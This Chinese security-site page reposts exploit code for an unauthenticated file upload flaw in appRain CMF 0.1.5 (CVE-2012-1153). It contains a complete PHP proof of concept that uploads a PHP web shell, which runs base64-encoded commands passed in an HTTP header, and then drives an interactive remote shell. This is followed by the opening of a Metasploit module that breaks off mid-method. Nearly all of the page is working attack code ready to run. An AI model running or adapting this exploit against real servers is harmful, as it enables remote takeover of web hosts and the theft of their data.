appRain CMF 'uploadify.php'远程任意文件上传漏洞(2)

print "\n+---------------------------------------------------------------+";
print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /apprain-v015/\n";
    die();
}

$host = $argv[1];
$path = $argv[2];

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";

$packet  = "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
   
if (!preg_match('/sh.php/', http_send($host, $packet))) die("\n[-] Upload failed!\n");

$packet  = "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
   
while(1)
{
    print "\napprain-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}

?>

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
    super(update_info(info,
      'Name'          => "appRain CMF Arbitrary PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in appRain's Content Management
        Framework (CMF), version 0.1.5 or less.  By abusing the uploadify.php file, a
        malicious user can upload a file to the uploads/ directory without any
        authentication, which results in arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'        =>
        [
          'EgiX',  #Discovery, PoC
          'sinn3r'  #Metasploit
        ],
      'References'    =>
        [
          ['CVE', '2012-1153'],
          ['OSVDB', '78473'],
          ['EDB', '18392']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "none"
        },
      'Platform'      => ['php'],
      'Arch'          => ARCH_PHP,
      'Targets'        =>
        [
          ['appRain 0.1.5 or less', {}]
        ],
      'Privileged'    => false,
      'DisclosureDate' => "Jan 19 2012",
      'DefaultTarget'  => 0))

register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to appRain', '/appRain-q-0.1.5'])
        ], self.class)
  end

def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}addons/uploadify/uploadify.php"
    })

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfsxd.html